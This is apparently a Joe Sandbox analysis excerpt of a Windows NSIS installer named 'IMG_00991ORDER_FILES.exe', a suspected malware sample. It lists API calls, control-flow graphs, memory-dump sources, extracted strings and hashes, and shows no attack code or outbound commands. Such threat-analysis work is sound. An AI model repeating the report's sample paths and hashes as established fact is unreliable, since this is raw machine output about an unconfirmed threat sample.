                                                                                      • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                                                                      • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                                                                    • lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,76BF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"), ref: 00403CA7
                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,76BF3420), ref: 00403D27
                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403D45
                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical), ref: 00403D8E
                                                                                      • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                                                                    • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE3
                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                                                                    • RegisterClassW.USER32(007A7200), ref: 00403E90
                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                    • API String ID: 1975747703-2260822255
                                                                                    • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                                                                    • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                                                                    • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                                                                    • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 332 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 335 4030f2-4030f7 332->335 336 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 332->336 337 4032d2-4032d6 335->337 344 403130 336->344 345 403215-403223 call 40303e 336->345 347 403135-40314c 344->347 351 403225-403228 345->351 352 403278-40327d 345->352 349 403150-403159 call 4034d1 347->349 350 40314e 347->350 358 40327f-403287 call 40303e 349->358 359 40315f-403166 349->359 350->349 354 40322a-403242 call 4034e7 call 4034d1 351->354 355 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 351->355 352->337 354->352 380 403244-40324a 354->380 355->352 378 403289-40329a 355->378 358->352 363 4031e2-4031e6 359->363 364 403168-40317c call 405fff 359->364 368 4031f0-4031f6 363->368 369 4031e8-4031ef call 40303e 363->369 364->368 383 40317e-403185 364->383 375 403205-40320d 368->375 376 4031f8-403202 call 406a35 368->376 369->368 375->347 379 403213 375->379 376->375 385 4032a2-4032a7 378->385 386 40329c 378->386 379->345 380->352 380->355 383->368 384 403187-40318e 383->384 384->368 388 403190-403197 384->388 389 4032a8-4032ae 385->389 386->385 388->368 390 403199-4031a0 388->390 389->389 391 4032b0-4032cb SetFilePointer call 405fff 389->391 390->368 392 4031a2-4031c2 390->392 395 4032d0 391->395 392->352 394 4031c8-4031cc 392->394 396 4031d4-4031dc 394->396 397 4031ce-4031d2 394->397 395->337 396->368 398 4031de-4031e0 396->398 397->379 397->396 398->368
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004030B3
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,00000400), ref: 004030CF
                                                                                      • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,80000000,00000003), ref: 00406048
                                                                                      • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040606A
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe,80000000,00000003), ref: 0040311B
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-3713005106
                                                                                    • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                                                    • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                                                                    • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                                                                    • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 684 406591-40659a 685 40659c-4065ab 684->685 686 4065ad-4065c7 684->686 685->686 687 4067d7-4067dd 686->687 688 4065cd-4065d9 686->688 690 4067e3-4067f0 687->690 691 4065eb-4065f8 687->691 688->687 689 4065df-4065e6 688->689 689->687 693 4067f2-4067f7 call 406554 690->693 694 4067fc-4067ff 690->694 691->690 692 4065fe-406607 691->692 695 4067c4 692->695 696 40660d-406650 692->696 693->694 698 4067d2-4067d5 695->698 699 4067c6-4067d0 695->699 700 406656-406662 696->700 701 406768-40676c 696->701 698->687 699->687 702 406664 700->702 703 40666c-40666e 700->703 704 4067a0-4067a4 701->704 705 40676e-406775 701->705 702->703 710 406670-40668e call 406422 703->710 711 4066a8-4066ab 703->711 706 4067b4-4067c2 lstrlenW 704->706 707 4067a6-4067af call 406591 704->707 708 406785-406791 call 406554 705->708 709 406777-406783 call 40649b 705->709 706->687 707->706 718 406796-40679c 708->718 709->718 723 406693-406696 710->723 712 4066ad-4066b9 GetSystemDirectoryW 711->712 713 4066be-4066c1 711->713 719 40674b-40674e 712->719 720 4066d3-4066d7 713->720 721 4066c3-4066cf GetWindowsDirectoryW 713->721 718->706 724 40679e 718->724 725 406760-406766 call 406802 719->725 726 406750-406753 719->726 720->719 727 4066d9-4066f7 720->727 721->720 723->726 728 40669c-4066a3 call 406591 723->728 724->725 725->706 726->725 730 406755-40675b lstrcatW 726->730 732 4066f9-4066ff 727->732 733 40670b-406717 call 406948 727->733 728->719 730->725 737 406707-406709 732->737 740 40671f-406723 733->740 737->733 739 406745-406749 737->739 739->719 741 406725-406738 SHGetPathFromIDListW CoTaskMemFree 740->741 742 40673a-406743 740->742 741->739 741->742 742->727 742->739
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066B3
                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,?,?), ref: 004066C9
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406727
                                                                                    • CoTaskMemFree.OLE32(00000000,?,?,00000007,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,?,?), ref: 00406730
                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,?,?), ref: 0040675B
                                                                                    • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,?,?), ref: 004067B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                    • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 4024019347-1528010029
                                                                                    • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                                                    • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                                                                    • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                                                                    • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 743 4055d9-4055ee 744 4055f4-405605 743->744 745 4056a5-4056a9 743->745 746 405610-40561c lstrlenW 744->746 747 405607-40560b call 406591 744->747 748 405639-40563d 746->748 749 40561e-40562e lstrlenW 746->749 747->746 752 40564c-405650 748->752 753 40563f-405646 SetWindowTextW 748->753 749->745 751 405630-405634 lstrcatW 749->751 751->748 754 405652-405694 SendMessageW * 3 752->754 755 405696-405698 752->755 753->752 754->755 755->745 756 40569a-40569d 755->756 756->745
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,00000000,0079A700,76BF23A0), ref: 00405611
                                                                                    • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,00000000,0079A700,76BF23A0), ref: 00405621
                                                                                    • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,00000000,0079A700,76BF23A0), ref: 00405634
                                                                                    • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll), ref: 00405646
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405686
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll
                                                                                    • API String ID: 2531174081-2651302151
                                                                                    • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                                                    • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                                                                    • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                                                                    • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 757 4032d9-4032f0 758 4032f2 757->758 759 4032f9-403302 757->759 758->759 760 403304 759->760 761 40330b-403310 759->761 760->761 762 403320-40332d call 4034d1 761->762 763 403312-40331b call 4034e7 761->763 767 403333-403337 762->767 768 4034bf 762->768 763->762 769 40346a-40346c 767->769 770 40333d-403363 GetTickCount 767->770 771 4034c1-4034c2 768->771 772 4034ac-4034af 769->772 773 40346e-403471 769->773 774 4034c7 770->774 775 403369-403371 770->775 776 4034ca-4034ce 771->776 780 4034b1 772->780 781 4034b4-4034bd call 4034d1 772->781 773->774 777 403473 773->777 774->776 778 403373 775->778 779 403376-403384 call 4034d1 775->779 783 403476-40347c 777->783 778->779 779->768 791 40338a-403393 779->791 780->781 781->768 789 4034c4 781->789 786 403480-40348e call 4034d1 783->786 787 40347e 783->787 786->768 794 403490-40349c call 4060f6 786->794 787->786 789->774 793 403399-4033b9 call 406aa3 791->793 799 403462-403464 793->799 800 4033bf-4033d2 GetTickCount 793->800 801 403466-403468 794->801 802 40349e-4034a8 794->802 799->771 803 4033d4-4033dc 800->803 804 40341d-40341f 800->804 801->771 802->783 809 4034aa 802->809 805 4033e4-403415 MulDiv wsprintfW call 4055d9 803->805 806 4033de-4033e2 803->806 807 403421-403425 804->807 808 403456-40345a 804->808 814 40341a 805->814 806->804 806->805 811 403427-40342e call 4060f6 807->811 812 40343c-403447 807->812 808->775 813 403460 808->813 809->774 817 403433-403435 811->817 816 40344a-40344e 812->816 813->774 814->804 816->793 818 403454 816->818 817->801 819 403437-40343a 817->819 818->774 819->816
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$wsprintf
                                                                                    • String ID: ... %d%%$STy
                                                                                    • API String ID: 551687249-2882605797
                                                                                    • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                                                    • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                                                                    • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                                                    • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 820 4068d8-4068f8 GetSystemDirectoryW 821 4068fa 820->821 822 4068fc-4068fe 820->822 821->822 823 406900-406909 822->823 824 40690f-406911 822->824 823->824 825 40690b-40690d 823->825 826 406912-406945 wsprintfW LoadLibraryExW 824->826 825->826
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                                                                    • wsprintfW.USER32 ref: 0040692A
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.6645287943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.6645267106.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645314008.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645338403.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.6645828862.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                    • API String ID: 2200240437-1106614640
                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
